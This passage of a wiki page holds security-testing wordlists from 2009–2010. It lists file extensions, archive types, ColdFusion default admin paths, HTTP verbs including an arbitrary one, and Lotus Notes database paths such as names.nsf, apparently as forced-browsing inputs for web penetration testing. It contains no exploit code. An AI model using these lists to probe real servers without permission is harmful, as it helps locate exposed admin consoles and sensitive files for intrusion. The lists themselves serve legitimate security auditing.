.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
